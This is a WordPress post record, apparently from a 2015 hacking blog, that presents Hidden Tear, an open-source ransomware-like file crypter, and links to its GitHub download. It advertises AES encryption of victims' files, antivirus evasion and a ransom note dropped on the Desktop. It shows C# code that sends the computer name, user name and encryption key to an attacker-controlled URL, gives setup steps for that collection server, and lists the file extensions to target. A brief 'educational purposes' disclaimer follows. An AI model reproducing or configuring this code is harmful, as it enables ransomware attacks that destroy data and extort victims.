{"id":2539,"date":"2015-08-20T04:53:48","date_gmt":"2015-08-20T04:53:48","guid":{"rendered":"http:\/\/www.pir8geek.com\/?p=2539"},"modified":"2015-08-20T04:53:48","modified_gmt":"2015-08-20T04:53:48","slug":"hidden-tear-an-opensource-ransomware-like-file-crypter","status":"publish","type":"post","link":"https:\/\/www.jameseduard.com\/?p=2539","title":{"rendered":"Hidden-Tear &#8211; An OpenSource Ransomware-like File Crypter"},"content":{"rendered":"<pre class=\"\"><code>    _     _     _     _              _                  \n    | |   (_)   | |   | |            | |                 \n    | |__  _  __| | __| | ___ _ __   | |_ ___  __ _ _ __ \n    | '_ \\| |\/ _` |\/ _` |\/ _ \\ '_ \\  | __\/ _ \\\/ _` | '__|\n    | | | | | (_| | (_| |  __\/ | | | | ||  __\/ (_| | |   \n    |_| |_|_|\\__,_|\\__,_|\\___|_| |_|  \\__\\___|\\__,_|_|   \n<\/code><\/pre>\n<p>It&#8217;s a ransomware-like file crypter sample which can be modified for specific purposes.<br \/>\n<strong>Features<\/strong><\/p>\n<ul>\n<li>Uses the AES algorithm to encrypt files.<\/li>\n<li>Sends the encryption key to a server.<\/li>\n<li>Encrypted files can be decrypted in the decrypter program with the encryption key.<\/li>\n<li>Creates a text file on the Desktop with a given message.<\/li>\n<li>Small file size (12 KB)<\/li>\n<li>Not detected by antivirus programs (15\/08\/2015) <a href=\"http:\/\/nodistribute.com\/result\/6a4jDwi83Fzt\">http:\/\/nodistribute.com\/result\/6a4jDwi83Fzt<\/a><\/li>\n<\/ul>\n<p><strong>Demonstration Video:<\/strong><br \/>\n<iframe title=\"hidden tear demonstration\" width=\"640\" height=\"360\" src=\"https:\/\/www.youtube.com\/embed\/LtiRISepIfs?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><br \/>\n&nbsp;<br \/>\n<strong>Usage:<\/strong><\/p>\n<ul>\n<li>You need to have a web server which supports scripting languages 
like PHP, Python, etc. Change this line to use your URL. (You should use an HTTPS connection to avoid eavesdropping.) <code>string targetURL = \"https:\/\/www.example.com\/hidden-tear\/write.php?info=\";<\/code><\/li>\n<li>The script should write the GET parameter to a text file. The sending process runs in the <code>SendPassword()<\/code> function:\n<pre><code>string info = computerName + \"-\" + userName + \" \" + password;\nvar fullUrl = targetURL + info;\nvar conent = new System.Net.WebClient().DownloadString(fullUrl);\n<\/code><\/pre>\n<\/li>\n<li>Target file extensions can be changed. Default list:<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<pre>var validExtensions = new[]{\".txt\", \".doc\", \".docx\", \".xls\", \".xlsx\", \".ppt\", \".pptx\", \".odt\", \".jpg\", \".png\", \".csv\", \".sql\", \".mdb\", \".sln\", \".php\", \".asp\", \".aspx\", \".html\", \".xml\", \".psd\"};\n<\/pre>\n<p><strong>Legal Warning<\/strong><br \/>\nWhile this may be helpful for some, there are significant risks. Hidden Tear may be used only for educational purposes. Do not use it as ransomware! 
You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent.<br \/>\n<a href=\"https:\/\/github.com\/utkusen\/hidden-tear\" target=\"_blank\" rel=\"noopener noreferrer\">Download Hidden-Tear at GitHub<\/a><br \/>\nCredits to:<br \/>\n<strong>Utku Sen<\/strong> &#8211; A Turkish security researcher<\/p>\n","protected":false},"excerpt":{"rendered":"<p>_ _ _ _ _ | | (_) | | | | | | | |__ _ __| | __| | ___ _ __ | |_ ___ __ _ _ __ | &#8216;_ \\| |\/ _` |\/ _` |\/ _ \\ &#8216;_ \\ | __\/ _ \\\/ _` | &#8216;__| | | | | |<\/p>\n","protected":false},"author":1,"featured_media":2542,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[394,443,554,13,556],"tags":[553,555],"class_list":["post-2539","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cryptography","category-hacking","category-malware","category-opensource","category-ransomeware","tag-crypter","tag-ransomware"],"_links":{"self":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2539","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2539"}],"version-history":[{"count":0,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2539\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2539"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2539"},{
"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2539"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}